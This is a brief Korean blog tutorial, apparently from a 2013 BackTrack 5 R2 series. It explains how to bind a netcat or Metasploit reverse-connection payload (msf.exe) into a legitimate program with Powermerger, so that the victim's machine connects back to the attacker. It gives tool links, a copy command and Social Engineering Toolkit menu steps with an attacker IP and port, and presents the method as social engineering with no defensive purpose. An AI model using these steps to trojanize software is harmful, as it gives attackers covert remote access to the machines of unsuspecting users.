728x90
이 공격은 NetCat 리버스 커넥션에서 한단계 업그레이드된 방법으로써
소셜해킹 , 인간관계적인 해킹을 사용하는 방법입니다.
정상적이고 실행하고싶거나 실행해야하는 프로그램에 공격자의 nc.exe를 병합하여 반강제적으로 NetCat 공격을 감행하는것입니다. 이 공격에 감염되었던 사례가 네이트온과 농협 해킹사건입니다.
이 과정에는 두가지 프로그램이 필요합니다.
nc.exe( netcat 프로그램 ) 과 파일병합 프로그램 Powermerger
NetCat
UNIX/LINUX 용 : http://netcat.sourceforge.net/download.php
Windows 용 : http://www.securityfocus.com/tools/139
Powermerger
[정상파일에 exploit 삽입하여 Back door 감염]
msf.exe
- cp msf.exe /root/Desktop
1) social engneering toolkit -> set
2) 1 -> 4 -> 공격자 ip -> 2 -> 16 -> port -> yes
#ctrl + shift + t
BT5R2 의 바탕화면에 생성된 msf.exe 파일을 정상적인 프로그램에 병합하여 파일실행 시 공격자의 컴퓨터에 사용자가 연결 되어 공격자가 NetCat을 이용해 사용자 컴퓨터를 공격 할 수 있습니다.
'it > network' 카테고리의 다른 글
| [BT5R2] 웹 취약점을 이용한 리버스 커넥션 (0) | 2013.08.07 |
|---|---|
| [BT5R2] wireshark 취약점 공격 (0) | 2013.07.30 |
| [BT5R2] MS10_002_aurora 공격 (0) | 2013.07.30 |
